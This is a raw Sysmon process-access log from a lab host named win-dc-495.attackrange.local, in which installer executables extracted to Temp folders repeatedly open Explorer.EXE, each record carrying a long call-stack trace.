13:59:52.380{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000014961Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.380{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000014960Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.380{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 10341000x800000000000000014959Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.380{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000014958Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.380{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000014957Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.380{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000014956Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.380{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000014955Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.380{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000014954Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014953Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014952Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.380{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000014951Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014950Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.380{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000014949Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014948Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.380{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000014947Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014946Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014945Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014944Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
